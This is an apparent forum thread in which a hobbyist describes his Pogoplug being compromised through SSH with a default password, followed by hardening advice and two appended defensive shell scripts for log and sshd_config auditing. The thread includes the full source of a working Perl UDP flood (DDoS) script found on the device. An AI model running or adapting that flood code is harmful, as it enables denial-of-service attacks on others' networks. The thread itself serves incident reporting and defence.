My pogoplug got hacked!

This forum is for Marvell Kirkwood devices such as the GoFlex Home/Net, PogoPlug v1/v2, SheevaPlug, and ZyXEL devices.

My pogoplug got hacked!

Postby rev667 » Mon Jul 28, 2014 10:12 am

On Friday I bought a 500Gb mobile hard drive, special offer at the local supermarket.

So over the weekend, I unplugged the old flash memory stick from my Pogo (E02), rebooted to stock, and basically followed Qui's tutorial.

Installed Arch on sda1 (8Gb), formatted the rest for data (sda2).

Installed samba, then the original pogoplug functions from moonman's instructions, all was good with the world.

Copied some files over from my linux mint PC, and to/from the wife's windows PC. Tested the mypogo website was working ok.

By Sunday evening I was contemplating installing a webserver, mysql, php stack... and then the internet connection failed. I have a Sky broadband setup, with a cute Sky wireless ADSL modem/router, the internet indicator was orange, telling me there was no internet.

Tried rebooting the router, still no connection. So left it alone suspecting a problem at the exchange, and went to bed.

This morning the router was healthy, and booting up my PC (into windows for a change) I was connected to the net. The wireless connection to the router wasn't active for some reason (my PC is wired not wireless), and I had to refresh it. But it was all working fine, updated my noip.me dynamic dns, and went to work.

At work I fired up putty and checked I could ssh into the pogo from outside the lan, that worked fine, but I noticed a file in the root home directory.

It was a perl? script, inside there was a reference to a Romanian website, and some printf commands which google translate suggested this was some kind of DDOS script. (I can copy/paste it here later)

So I phoned the wife, and got her to remove the power lead from the Pogo, just to be safe.

I suspect this script, or maybe something else was randomly sending packets and either the router fell over, or maybe the dslam at the exchange.

When I get home tonight, I'll copy/paste the script, and flatten sda1 before re-installing arch, and the first command I'll issue will be 'passwd'.

I will also check the port forwarding on the router hasn't been changed, and run security scans on all my PCs and OSs.

So this is a word of warning, CHANGE THE DEFAULT PASSWORD AS SOON AS POSSIBLE!

Still, it's all good fun :)

Rev.
rev667
 
Posts: 18
Joined: Tue May 07, 2013 8:19 am

Re: My pogoplug got hacked!

Postby hydro » Mon Jul 28, 2014 11:41 am

VDR on DockStar / Pogoplug E02: http://linux.bplaced.net/
hydro
 
Posts: 210
Joined: Wed Jun 15, 2011 2:03 pm
Location: Germany

Re: My pogoplug got hacked!

Postby rev667 » Mon Jul 28, 2014 2:30 pm

Cheers for that Hydro,

Plenty of brain-twisting reading there... mainly because they assume you know how to do certain things, for example:

"Before effecting this setting, make sure that all accounts which require SSH access have public key authentication set up in the corresponding authorized_keys files."

I have no idea how to do this, therefore I have to read up on that topic, which will lead me onto another topic etc. etc.

I'll have to look at the logs out of curiosity.

Rev
rev667
 
Posts: 18
Joined: Tue May 07, 2013 8:19 am

Re: My pogoplug got hacked!

Postby hydro » Mon Jul 28, 2014 3:01 pm

That's explained on another Wiki site, but a safe password should do.
https://wiki.archlinux.org/index.php/SSH_keys
VDR on DockStar / Pogoplug E02: http://linux.bplaced.net/
hydro
 
Posts: 210
Joined: Wed Jun 15, 2011 2:03 pm
Location: Germany

Re: My pogoplug got hacked!

Postby grayman4hire » Mon Jul 28, 2014 4:00 pm

@rev667,

Are you saying you opened up external ssh access (via port forwarding on your router - port 22 also?) to your pogoplug without changing the default root password? If so, what happened would be expected.
Gray
grayman4hire
 
Posts: 350
Joined: Sat Sep 29, 2012 12:03 am
Location: SF, CA

Re: My pogoplug got hacked!

Postby rev667 » Mon Jul 28, 2014 4:48 pm

yup, I forgot to change the default password, dumb, but live and learn.

Reading up now on stuff, change crappy router port forwarding rules, can't change the router cos Sky broadband uses a custom authentication protocol :/

Anyway, I'm home now, so an evening re-installing alarm and trying to remember to add a bit more security hehe.

For those interested in the odd file I found, it's pasted below.

```perl
#!/usr/bin/perl


use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "for any info vizit http: //hacking[dot]3xforum[period]ro/ \n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

printf "ovica Se Apuca De Floodat $ip Pe Portu $port \n";
printf "Daca Nu Lesina In 10 Minute Mai Incercam Odata Pana Pica \n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
```

I have not visited the site, no intention of doing so.

Rev (dumb but still smiling)
Last edited by WarheadsSE on Mon Jul 28, 2014 5:01 pm, edited 1 time in total.
Reason: edited URL present so it doesn't show up as a valid trackable link linking us to it.
rev667
 
Posts: 18
Joined: Tue May 07, 2013 8:19 am

Re: My pogoplug got hacked!

Postby moonman » Mon Jul 28, 2014 8:25 pm

Change the default internet facing port of ssh to something else too. I did see a lot of failed attempts to authenticate as root before I changed the port.
Pogoplug V4 | GoFlex Home | Raspberry Pi 4 4GB | CuBox-i4 Pro | ClearFog | BeagleBone Black | Odroid U2 | Odroid C1 | Odroid XU4
-----------------------------------------------------------------------------------------------------------------------
[armv5] Updated U-Boot | [armv5] NAND Rescue System
moonman
Developer
 
Posts: 3388
Joined: Sat Jan 15, 2011 3:36 am
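The failed root logins moonman mentions are visible in the sshd log on Arch Linux ARM (journalctl -u sshd). The script below is an added example, not code from this thread or from the Arch Linux ARM project: it counts failed password attempts per source address and flags any address that failed repeatedly and then got in, which is the pattern of a guessed default password. The log lines are constructed samples in sshd's syslog format, using documentation address ranges.

```shell
#!/bin/sh
# Added example (not from the thread): spot SSH password guessing in sshd log
# lines. Input is the "journalctl -u sshd" short format; the sample below is
# constructed, and the addresses are documentation ranges, not real hosts.

SAMPLE_LOG='Jul 27 21:03:11 alarm sshd[812]: Failed password for root from 203.0.113.45 port 51234 ssh2
Jul 27 21:03:13 alarm sshd[812]: Failed password for root from 203.0.113.45 port 51236 ssh2
Jul 27 21:03:14 alarm sshd[815]: Failed password for invalid user admin from 198.51.100.7 port 40022 ssh2
Jul 27 21:03:15 alarm sshd[812]: Failed password for root from 203.0.113.45 port 51238 ssh2
Jul 27 21:03:19 alarm sshd[819]: Accepted password for root from 203.0.113.45 port 51240 ssh2
Jul 27 21:04:02 alarm sshd[823]: Failed password for root from 198.51.100.7 port 40030 ssh2'

# failed_by_ip: read log lines on stdin, print "count ip" per source address
# with failed password attempts, most frequent first.
failed_by_ip() {
    grep 'Failed password for' \
    | sed -n 's/.* from \([0-9.]*\) port .*/\1/p' \
    | sort | uniq -c | sort -rn \
    | awk '{print $1, $2}'
}

# accepted_after_failures THRESHOLD: read log lines on stdin, print each
# source address that failed at least THRESHOLD times and later got an
# "Accepted password" line, i.e. a password that was guessed rather than typed.
accepted_after_failures() {
    threshold="$1"
    log="$(cat)"
    printf '%s\n' "$log" | failed_by_ip | while read -r count ip; do
        [ "$count" -ge "$threshold" ] || continue
        if printf '%s\n' "$log" | grep -q "Accepted password for .* from $ip port"; then
            printf '%s\n' "$ip"
        fi
    done
}

# On the device itself:   journalctl -u sshd --no-pager | failed_by_ip
# Against the constructed sample:
printf '%s\n' "$SAMPLE_LOG" | failed_by_ip
printf '%s\n' "$SAMPLE_LOG" | accepted_after_failures 3
```

A successful login right after a burst of failures from the same address is the signal worth alerting on; a burst of failures alone is just the background noise that prompted the port change.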

Re: My pogoplug got hacked!

Postby rev667 » Mon Jul 28, 2014 8:49 pm

New alarm installed, proper password, samba working. Next is the crappy sky router.

http://www.instructables.com/id/Sky-Hub-SR101-Modification-Fix/

As well as close all port forwarding until I figure out some better security, perhaps a double-knock ssh scheme.

Now onto a LAMP stack, lighttpd, mariadb, php I think.

Rev
rev667
 
Posts: 18
Joined: Tue May 07, 2013 8:19 am

Re: My pogoplug got hacked!

Postby grayman4hire » Mon Jul 28, 2014 9:26 pm

I don't think you need to get too fancy. Set a nice long password and open up ssh access on a non-standard port (and disable root ssh login). This should deal with 99.9% of the hacking attempts.
grayman4hire
 
Posts: 350
Joined: Sat Sep 29, 2012 12:03 am
Location: SF, CA

Re: My pogoplug got hacked!

Postby WarheadsSE » Mon Jul 28, 2014 9:59 pm

Or skip all password issues entirely, set reasonable passwords for the users, and use ssh-keys only by disabling ssh with password auth. :)
Core Developer
Remember: Arch Linux ARM is entirely community donation supported!
WarheadsSE
Developer
 
Posts: 6807
Joined: Mon Oct 18, 2010 2:12 pm
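The advice from grayman4hire (non-standard port, no root login) and WarheadsSE (keys only, no password auth) comes down to three sshd_config keywords. The script below is an added example, not code from this thread or from Arch Linux ARM: it shows the weak settings beside the hardened ones and provides an audit function that reads an sshd_config and reports which of the three are still open. Both configs are constructed samples, the path /etc/ssh/sshd_config is the usual one on Arch, and the check assumes the standard capitalisation of keywords (sshd itself accepts them case-insensitively).

```shell
#!/bin/sh
# Added example (not from the thread): audit the sshd_config settings behind
# the hardening advice in this thread. Sample configs are constructed.

# What an unchanged install effectively exposes once port 22 is forwarded.
WEAK_CONFIG='Port 22
PermitRootLogin yes
PasswordAuthentication yes'

# Non-standard port, no root login, keys only. Switch PasswordAuthentication
# off only after an authorized_keys login has been tested from a second
# session, or you lock yourself out of the box.
HARDENED_CONFIG='Port 2222
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
MaxAuthTries 3'

# setting NAME: print the effective value of keyword NAME from the config on
# stdin, or "unset" if it is never given. sshd honours the first occurrence
# of a keyword, so the first match wins.
setting() {
    value=$(sed -n "s/^[[:space:]]*$1[[:space:]]\{1,\}\([^[:space:]#]*\).*/\1/p" | head -n 1)
    printf '%s\n' "${value:-unset}"
}

# audit_sshd_config: read a config on stdin, print one FINDING line per weak
# setting and return the number of findings (0 means nothing to flag).
audit_sshd_config() {
    cfg=$(cat)
    findings=0

    port=$(printf '%s\n' "$cfg" | setting Port)
    if [ "$port" = "22" ] || [ "$port" = "unset" ]; then
        echo "FINDING: Port is $port (sshd defaults to 22); a non-standard port cuts most scanner noise"
        findings=$((findings + 1))
    fi

    root=$(printf '%s\n' "$cfg" | setting PermitRootLogin)
    if [ "$root" != "no" ] && [ "$root" != "prohibit-password" ]; then
        echo "FINDING: PermitRootLogin is $root; set it to no and log in as an unprivileged user"
        findings=$((findings + 1))
    fi

    pw=$(printf '%s\n' "$cfg" | setting PasswordAuthentication)
    if [ "$pw" != "no" ]; then
        echo "FINDING: PasswordAuthentication is $pw (sshd defaults to yes); set up authorized_keys, then set it to no"
        findings=$((findings + 1))
    fi

    return "$findings"
}

# On the device:  audit_sshd_config < /etc/ssh/sshd_config
# Against the constructed samples:
printf '%s\n' "$WEAK_CONFIG" | audit_sshd_config || echo "weak config: $? finding(s)"
printf '%s\n' "$HARDENED_CONFIG" | audit_sshd_config && echo "hardened config: no findings"
```

An unset PermitRootLogin is reported as a finding on purpose: the default was yes in the OpenSSH 6.x shipping in 2014, so the safe move is to set it explicitly rather than rely on whatever version is installed.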

